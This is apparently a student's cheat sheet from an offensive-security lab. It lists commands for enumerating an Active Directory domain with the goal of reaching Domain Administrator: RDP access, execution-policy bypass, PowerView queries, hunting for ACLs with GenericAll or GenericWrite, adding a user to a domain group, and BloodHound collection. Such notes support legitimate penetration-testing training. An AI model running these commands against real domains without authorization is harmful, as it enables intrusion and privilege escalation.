Enumeration
NOTE: Goal is to privilege escalate to Domain Administrator
Initial Access
RDP
xfreerdp3 /u:'<Username>' /d:'<Domain Name>' /p:'<Password>' /v:<Target IP Address> /dynamic-resolution +clipboard /drive:/home/kali/offsec/downloads,/sharedEnumeration
Manual
NOTE: Make sure to run the following!
powershell -ep bypass
Get users on domain
net user /domainGet info on particular user
net user <Username> /domainGet groups on domain
net group /domainGet info on particular CUSTOM group
net group "<Group Name>" /domainPowerView
NOTE: Remember to run the following
powershell -ep bypassImport-Module .\PowerView.ps1
Enumerate Users in the Domain
Get-NetUserTo get filtered result
Get-NetUser | select <Field Name> ...EXAMPLE:
Get-NetUser | select samaccountname, cn, pwdlastset, lastlogon
To get specific information of a particular user
Get-NetUser <Username>Enumerate Groups in the Domain
Get-NetGroupTo get filtered result
Get-NetGroup | select <Field name> ...EXAMPLE:
Get-NetGroup | select cn
To get specific information of a particular group
Get-NetGroup <Group Name>Enumerate Computers in the Domain
Get-NetComputerTo get filtered result
Get-NetComputer | select <Field name> ...EXAMPLE:
Get-NetComputer | select operatingsystem, dnshostname
To get specific information of a particular computer
Get-NetComputer <DNS Host Name>To look for administrative rights on other computer for the current user
Find-LocalAdminAccessTo look for logged on users on target machine
Get-NetSession -ComputerName <Computer Name> -VerboseNOTE: If something is not right check for permission.
Permissions for NetSessionEnum are defined in SrvsvcSessionInfo registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity)
Alternatives
C:\Tools\PSTools\PsLoggedon.exe \\<Host Name>NOTE: Remote machine must have Remote Registry service enabled
To check for permission
Get-Acl -Path <Registery Hive>:<Registry Path> | flEXAMPLE:
Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
To enumerate Service Principal Name
Get-NetUser -SPN | select samaccountname, serviceprincipalnameTo enumerate ACEs
Get-ObjectAcl -Identity "<Username | Group Name>"NOTE: Look out for ActiveDirectoryRights and SecurityIdentifier
To enumerate interesting ACL
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ftTo enumerate all user that has ActiveDirectoryRights = GenericAll under a group
Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRightsTo enumerate all ActiveDirectoryRights = GenericWrite under a group
Get-ObjectAcl -Identity "<Group Name>" | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier, ActiveDirectoryRightsTo convert SID to Name in bulk
"<SID>", "<SID>", "<SID>", "<SID>", "<SID>" | Convert-SidToNameTo convert SID to Name individually
Convert-SidToName "<SID>"Add user into group in domain
net group "<Group Name>" <Username> /add /domainTo enumerate all shares on Domain
Find-DomainShareTo enumerate shares available to current user
Find-DomainShare -CheckShareAccessTo enumerate Group Policy
Get-GPO -Name "<Group Policy Name>"EXAMPLE:
Get-GPO -Name "Default Domain Policy"
To enumerate permission on the group policy
Get-GPPermission -Guid <Group Unique ID> -TargetType User -TargetName <Username>NOTE: Only if the permission either contains "ModifySecurity" or "FullControl"
BloodHound
To import BloodHound
Import-Module C:\Tools\Bloodhound.ps1To begin enumerationg on BloodHound
Invoke-BloodHound -CollectionMethod All -OutputDirectory <Path> -OutputPrefix "corp audit"On kali:
sudo neo4j startNOTE: Head over to http://localhost:7474
Username: neo4j
Password: arctic-iris-zipper-prism-courage-7161
Last updated